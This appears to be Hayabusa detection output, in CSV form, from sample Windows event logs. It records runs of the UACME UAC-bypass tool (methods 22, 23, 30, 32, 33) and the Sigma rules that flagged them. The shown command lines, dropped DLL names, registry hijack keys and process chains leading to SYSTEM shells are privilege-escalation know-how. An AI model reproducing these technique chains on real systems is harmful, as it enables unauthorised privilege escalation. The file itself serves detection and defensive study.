2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 324 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4060 | PGUID: 747F3D96-5E6F-5D45-0000-00103B989D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\fodhelper.exe"" | Process: C:\Windows\System32\fodhelper.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 33 | LID: 0x18d3b3 | PID: 8180 | PGUID: 747F3D96-5E6F-5D45-0000-001014CA9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\fodhelper.exe"" | LID: 0x18d3b3 | PID: 3656 | PGUID: 747F3D96-5E70-5D45-0000-0010FCDD9D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/proc_creation_win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,PrivEsc - UAC bypass UACME-33 | DeleteKey: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\ms-settings\shell\open\command | Process: C:\Windows\explorer.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:14:08.799 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 4440 | PGUID: 747F3D96-5E6A-5D45-0000-001076639D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 32 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 32 | Path: C:\Users\IEUser\AppData\Local\Temp\OskSupport.dll | Process: C:\Windows\explorer.exe | PID: 6380 | PGUID: 747F3D96-6742-5D45-0000-00104A66B500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,Evas | PrivEsc,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-6742-5D45-0000-00102A72B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 324 | PGUID: 747F3D96-6743-5D45-0000-0010DAA8B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 6456 | PGUID: 747F3D96-6743-5D45-0000-001068D7B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3fb | PID: 5840 | PGUID: 747F3D96-6744-5D45-0000-00108BE4B500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064425400 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5124 | PGUID: 747F3D96-6744-5D45-0000-00102FE6B500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 32 | LID: 0x18d3b3 | PID: 5524 | PGUID: 747F3D96-6744-5D45-0000-0010040CB600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 30 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 30 | Path: C:\Users\IEUser\AppData\Local\Temp\wow64log.dll | Process: C:\Windows\explorer.exe | PID: 7984 | PGUID: 747F3D96-6EA3-5D45-0000-0010204DE100,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.560 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3640 | PGUID: 747F3D96-6EA3-5D45-0000-0010FB58E100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3fb | PID: 3340 | PGUID: 747F3D96-6EA4-5D45-0000-0010DD92E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064427C00 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6292 | PGUID: 747F3D96-6EA5-5D45-0000-0010E19FE100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\wusa.exe"" | Process: C:\Windows\SysWOW64\wusa.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 30 | LID: 0x18d3b3 | PID: 6312 | PGUID: 747F3D96-6EA5-5D45-0000-0010C5C4E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.666 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 932 | PGUID: 747F3D96-6EA5-5D45-0000-00107AC9E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 | LID: 0x3e7 | PID: 6068 | PGUID: 747F3D96-6EA5-5D45-0000-001032CCE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 | Process: C:\Windows\SysWOW64\WerFault.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\syswow64\wusa.exe"" | LID: 0x18d3b3 | PID: 4348 | PGUID: 747F3D96-6EA5-5D45-0000-00107CCEE100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.803 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 30 | Image: C:\Windows\System32\wow64log.dll | Process: C:\Windows\SysWOW64\WerFault.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4768 | PGUID: 747F3D96-6EA5-5D45-0000-0010EED0E100 | Hash: SHA1=F26AD3298954CE6C5D01DC0ACC2B4A516554B430,MD5=7B97BFB44F4B8163AC336B0C85F62763,SHA256=5B08DFA2FA7CC474632485F1EC66CDCC0EEC9560C3630C1A8588EE345153209D,IMPHASH=3432208F552ABE01A0293828CD0796BE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 | LID: 0x3e7 | PID: 7844 | PGUID: 747F3D96-6EA5-5D45-0000-00108FD3E100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 23 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 23 | Path: C:\Users\IEUser\AppData\Local\Temp\dismcore.dll | Process: C:\Windows\explorer.exe | PID: 5080 | PGUID: 747F3D96-78DD-5D45-0000-0010B8A50301,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.933 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BCAF0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7560 | PGUID: 747F3D96-78DD-5D45-0000-0010B7B10301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3fb | PID: 3876 | PGUID: 747F3D96-78DE-5D45-0000-0010B3F60301",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 406 000002806444C740 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2040 | PGUID: 747F3D96-78DE-5D45-0000-0010FFFE0301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | Process: C:\Windows\System32\PkgMgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 23 | LID: 0x18d3b3 | PID: 216 | PGUID: 747F3D96-78DF-5D45-0000-0010622F0401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | Process: C:\Windows\System32\Dism.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml | LID: 0x18d3b3 | PID: 5756 | PGUID: 747F3D96-78DF-5D45-0000-0010BD350401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" | LID: 0x18d3b3 | PID: 4320 | PGUID: 747F3D96-78DF-5D45-0000-0010EF400401",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 22 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - UAC Bypass UACME 22 | Path: C:\Users\IEUser\AppData\Local\Temp\comctl32.dll | Process: C:\Windows\explorer.exe | PID: 5336 | PGUID: 747F3D96-792D-5D45-0000-00104F190601,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.818 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC3D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7472 | PGUID: 747F3D96-792D-5D45-0000-00107A250601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC9C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6716 | PGUID: 747F3D96-792E-5D45-0000-001001560601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC890 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 8072 | PGUID: 747F3D96-792E-5D45-0000-00104A760601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 272 00000280644BC170 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 2388 | PGUID: 747F3D96-792F-5D45-0000-00103DA80601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 22 | LID: 0x18d3fb | PID: 4604 | PGUID: 747F3D96-7930-5D45-0000-001027DC0601",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 318 0000028064471300 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6388 | PGUID: 747F3D96-7930-5D45-0000-001085EE0601,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.888 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - DLL Hijack - UACME 22 | Image: C:\Windows\System32\consent.exe.local\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.615_none_05b4414a072024d4\comctl32.dll | Process: C:\Windows\System32\consent.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4740 | PGUID: 747F3D96-7930-5D45-0000-001055DE0601 | Hash: SHA1=A309A622B9D4A62CFE59B73FDD32BD8384E66628,MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: consent.exe 896 318 0000028064471300 | LID: 0x3e7 | PID: 6000 | PGUID: 747F3D96-7933-5D45-0000-0010227E0701",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
